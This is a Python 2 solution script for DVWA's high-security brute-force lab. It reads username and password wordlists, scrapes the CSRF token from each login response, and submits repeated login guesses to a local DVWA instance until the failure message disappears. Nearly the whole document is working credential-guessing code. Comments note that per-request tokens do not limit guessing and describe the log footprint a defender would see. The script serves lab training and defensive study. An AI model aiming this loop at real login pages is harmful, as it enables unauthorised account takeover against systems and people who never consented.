DVWA Brute Force Hard - CSRF Token

  1. ############################################################################################################################################################################################################################
  2. #   DVWA Brute Force High: CSRF Token
  3. #  
  4. #   Solution to the Brute Force section on High Security - brute forces the password, extracting the CSRF token
  5. #   from the page to use in the next guess
  6. #  
  7. ############################################################################################################################################################################################################################
  8.  
  9.  
  10. import httplib
  11. import re
  12.  
# CSRF token of the format:
# <input type="hidden" name="user_token" value="b59fc306cc2b62fc89667c2f42122e1f">
# (csrf_pattern below matches single-quoted attributes and a trailing " />", so
# the markup DVWA actually emits is presumably the single-quoted form — verify
# against the page if the token is not found.)

# URL template for one login attempt; ^USER^, ^PASS^ and ^USERTOKEN^ are
# substituted per guess in the loop below. The credentials travel in the GET
# query string, so every guess is recorded verbatim in the web server's access
# log — which is also where a defender sees a run of this script as many
# requests to one path from one session, differing only in password=.
request = "/dvwa/vulnerabilities/brute/index.php?username=^USER^&password=^PASS^&Login=Login&user_token=^USERTOKEN^"
#username = "admin"
# Wordlists, one entry per line. NOTE(review): the backslashes are not escaped;
# '\U' is only an escape sequence in Python 2 unicode literals, so these work as
# Python 2 str literals but are a SyntaxError under Python 3. A raw string
# (r'C:\...') would be portable.
passwordfile = 'C:\Users\Administrator\Desktop\pass.txt'
usersfile = 'C:\Users\Administrator\Desktop\user.txt'
# Hard-coded DVWA session. security=high presumably selects the lab level whose
# login form carries the CSRF token; the PHPSESSID must be a live session, since
# user_token looks to be bound to it — if the session is no longer valid the
# token is not in the response and m.group(1) below raises AttributeError.
cookies = "security=high; PHPSESSID=6ek9h8fph3mtr8lunrpoa0jq06"

# Marker DVWA prints on a failed login. Success is inferred purely from its
# absence, so any other response (error page, lockout notice, expired session)
# is also reported as a "correct" password.
failtext = "Username and/or password incorrect."

# readlines() keeps each trailing newline; entries are .strip()ped when used.
with open(passwordfile) as f:
    passwords = f.readlines()

with open(usersfile) as f:
    usernames = f.readlines()

for username in usernames:
    username = username.strip()

    #Collect the first CSRF token
    # A plain GET of the form page yields the token for the first guess; every
    # later guess reuses the token returned with the previous failure response.
    # The token therefore costs no extra requests and does not bound the number
    # of attempts — a per-request CSRF token is a CSRF control, not a
    # brute-force control; rate limiting, lockout or MFA is what stops this loop.
    conn = httplib.HTTPConnection("127.0.0.1")
    conn.request("GET", "/dvwa/vulnerabilities/brute/index.php", "", {"Cookie": cookies})
    result = conn.getresponse()
    #print result
    #print result.status, result.reason
    data = result.read()
    #print '{', data, '}'
    csrf_pattern = "<input type='hidden' name='user_token' value='(.*?)' />"
    m = re.search(csrf_pattern, data)
    user_token = m.group(1)   # AttributeError if no token matched (m is None)
    print "Working on user ", username
    print "INITIAL CSRF TOKEN :", user_token

    for password in passwords:
        password = password.strip()
        # A fresh connection per attempt; none of them is closed explicitly.
        conn = httplib.HTTPConnection("127.0.0.1")
        requestParams = request.replace("^USER^", username)
        requestParams = requestParams.replace("^PASS^", password).replace("^USERTOKEN^", user_token)
        #print requestParams
        conn.request("GET", requestParams, "", {"Cookie": cookies})
        result = conn.getresponse()
        #print result.status, result.reason
        data = result.read()
        if failtext in data:
            #print "Incorrect password attempted. ", password
            pass
        else:
            # First password that does not produce failtext ends the search for
            # this user; the outer loop then moves on to the next username.
            print "Found correct password:", username, password
            break
        # Take the token issued with this failure response for the next guess;
        # same AttributeError risk as above if the page no longer carries one.
        m = re.search(csrf_pattern, data)
        user_token = m.group(1)
        #print "NEXT CSRF TOKEN :", user_token